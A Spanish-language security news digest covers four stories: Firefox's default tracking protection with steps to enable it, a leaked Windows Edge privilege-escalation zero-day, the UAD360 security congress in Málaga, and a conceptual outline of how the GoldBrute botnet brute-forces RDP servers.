Como se prometió, Mozilla finalmente ha habilitado la función de «Protección de seguimiento mejorada» en su navegador Firefox de forma predeterminada, que a partir de ahora bloqueará automáticamente todas las cookies de seguimiento de terceros que permiten a los anunciantes y sitios web rastrear a los usuarios que navegan por las web.

Las cookies de seguimiento, también conocidas como cookies de terceros, permiten a los anunciantes controlar su comportamiento e intereses en línea, mediante los cuales muestran anuncios, contenido y promociones relevantes en los sitios web que visita.

Sin embargo, dado que las cookies de rastreo recopilan mucha más información sin requerir permisos explícitos de los usuarios y no hay control sobre cómo las usarían las compañías, la técnica también representa una amenaza masiva para la privacidad en línea de los usuarios. Para limitar este seguimiento extenso, Mozilla incluyó la opción «Protección de rastreo mejorada» como una función experimental en octubre del año pasado con el lanzamiento de Firefox 63 para bloquear «cookies de rastreo de terceros» conocidas compiladas por una herramienta de código abierto de anti-rastreo llamada Desconectar.

A partir de ahora, la configuración de «Protección de seguimiento mejorada» se habilitará de forma predeterminada para los nuevos usuarios que descarguen e instalen una copia nueva de Firefox, mientras que los usuarios existentes pueden habilitar la función manualmente o esperar a que Mozilla active la función para todos los usuarios en los próximos meses

Como activar la función de Protección de seguimiento

Para activar la función de Protección de seguimiento mejorada, simplemente siga los pasos a continuación:

• Haga clic en el icono del menú de su navegador web Firefox.
• Seleccione «Bloqueo de contenido».
• Ve a tu configuración de «Privacidad y Seguridad».
• Seleccione el engranaje «Custom».
• Ahora seleccione «rastreadores de terceros» en «Cookies».

Más información:

Enable and disable cookies that websites use to track your preferences
https://support.mozilla.org/en-US/kb/enable-and-disable-cookies-website-preferences

La investigadora en seguridad informática que opera bajo el pseudónimo de SandboxEscaper, publica una nueva vulnerabilidad para realizar un bypass contra algunas medidas de seguridad de sistemas operativos Windows.

Se trata de una vulnerabilidad que permite la elevación de privilegios en sistemas Windows a través del abuso del navegador nativo Microsoft Edge. Si en otras ocasiones, la investigadora avisó previamente a Microsoft de los fallos encontrados, en esta ocasión decidió filtrar las vulnerabilidades sin previo aviso.

Conviene recordar que la investigadora ha estado filtrando exploits y pruebas de concepto para estas vulnerabilidades durante las dos últimas semanas. Esta última permitiría, a través de una aplicación especialmente diseñada para ello, la elevación de privilegios y la toma de control completa sobre el sistema mediante la inyección de una DLL maliciosa.

Si bien es cierto que los vídeos que actúan como prueba de concepto abusan de Microsoft Edge, la investigadora indica que se trata de una vulnerabilidad que implica una race condition replicable en muchos otros paquetes.

El próximo día 11 de Junio, podrá comprobarse si Microsoft está al tanto de las vulnerabilidades y si incluye soluciones para las vulnerabilidades detectadas por SandboxEscaper.

Igualmente, podemos ver los vídeos que la investigadora aportó como demostración y prueba de concepto en las siguientes URLs:

Vídeo 1:

Vídeo 2:

Más información:

https://thehackernews.com/2019/05/microsoft-zero-day-vulnerability.html

El evento acogió el pasado fin de semana a cerca de 300 personas que se desplazaron desde muchos puntos de España para acudir al primer congreso de estas características en la provincia de Málaga.

Durante los días 7 y 8 de Junio ha tenido lugar en Málaga el congreso UAD360, el primer congreso de la provincia de Málaga netamente orientado a la seguridad informática, organizado por Hispasec y la Universidad de Málaga, y que contó con el patrocinio de Buguroo apoyo de Extenda y el Instituto Nacional de Ciberseguridad (INCIBE). El evento contó con la acogida de cerca de 300 personas venidas de distintos puntos de España, que acudieron puntuales a la cita.

UAD360 tuvo la suerte de contar para su primera edición con algunos de los profesionales más reputados del sector, que pusieron al alcance de los asistentes contenidos inéditos con un alto grado de especialización, innovación y calidad técnica.

Así, durante toda la jornada del sábado, el aula magna de la Facultad de Derecho se llenó para escuchar a Soledad Antelada, ingeniera en ciberseguridad del Berkeley National Lab, Bernardo Quintero, fundador de Virus Total, Sergio de los Santos, director de Innovación y Ciberseguridad en ElevenPaths (Telefónica Digital), David Santos, experto en seguridad informática implicado en el área de ciberseguridad de la Guardia Civil y Fernando Díaz, ingeniero de software en Virus Total.

Algunos de los temas tratados en las ponencias fueron la securización de la infraestructura de la red más rápida del mundo, las posibilidades – y brechas – en la anonimización permitida por la red TOR, el análisis del caso Wannacry, el estudio de código aplicado al hacking en videojuegos o la relevancia de vectores de ataque como la ingeniería social en los escenarios actuales de ciberdefensa, entre otros muchos que fueron sacados a la luz por el público asistente, durante la posterior mesa redonda con los ponentes y autoridades en la materia.

Si durante el sábado, la atención del congreso estuvo dirigida a estas ponencias, el viernes pudo disfrutarse de talleres prácticos repartidos en distintas aulas de la facultad. En este sentido, el público pudo comprobar en directo cómo se realiza una intrusión completa en una variedad de sistemas Windows, entender en profundidad cómo explotar vulnerabilidades en software para GNU/Linux mediante reversing y exploiting y la influencia y posibilidades de la Inteligencia Artificial en el campo de la seguridad informática.

De forma paralela, tuvo lugar un CTF, una competición por equipos donde los participantes hicieron gala de sus habilidades para resolver un total de 25 retos de temática variada (criptografía, análisis forense o exploiting, entre otras). Se entregaron, además, premios a los tres equipos que tuvieran la puntuación más alta, por valor de más de 4000€ entre suscripciones al servicio Koodous, periféricos tecnológicos y merchandising.

El evento terminó con una fiesta a la que estaban invitados todos los asistentes, que supuso una ocasión perfecta para acercarse de un modo menos académico y más distendido a la seguridad informática, a los especialistas que allí se dieron cita y de contactar con multitud de equipos de hacking que acudieron al evento desde distintos puntos de España.

Investigadores de seguridad han descubierto una botnet que está llevando a cabo una campaña de fuerza bruta contra mas de un millón y medio de servidores RDP públicamente accesibles desde Internet.

Bautizada como GoldBrute, se ha diseñado de forma que escala gradualmente añadiendo cada máquina comprometida a la botnet y forzándolas a encontrar nuevos servidores RDP e intentar atacarlos por fuerza bruta.

Para pasar desapercibida, los atacantes detrás de esta campaña ordenaban a cada máquina infectada a hacer fuerza bruta a millones de servidores RDP con un conjunto único de pares de usuario y contraseña de modo que el servidor atacado recibe intentos de conexión desde direcciones IP diferentes cada vez.

La campaña, descubierta por Renato Marinho, de Morphus Labs, funciona de la siguiente forma:

Paso 1 – Después de acceder a un servidor RDP usando fuerza bruta, el atacante instala una botnet basada en Java en la máquina.

Paso 2 – Para controlar las máquinas infectadas, los atacantes utilizan un servidor C2 (command and control) con el que intercambiar ordenes e información sobre un WebSocket con cifrado AES.

Paso 3 y 4 – Cada máquina infectada recibe como primera tarea escanear y reportar al servidor C2 una lista de al menos 80 servidores RDP públicamente accesibles que pueden ser atacados por fuerza bruta.

Paso 5 y 6 – Los atacantes asignan a cada máquina infectada con un par único de usuario/contraseña como segunda tarea, para intentar hacer fuerza bruta contra la lista de servidores RDP que la máquina infectada recibe del servidor C2.

Paso 7 – En los casos en los que la credencial haya funcionado, se reporta la información de vuelta al servidor C2.

En este momento, una búsqueda rápida en Shodan arroja 2.4 millones de servidores RDP que pueden ser accedidos públicamente y probablemente más de la mitad de ellos estén siendo atacados por fuerza bruta.

Más Información:

https://morphuslabs.com/goldbrute-botnet-brute-forcing-1-5-million-rdp-servers-371f219ec37d

https://thehackernews.com/2019/06/windows-rdp-brute-force.html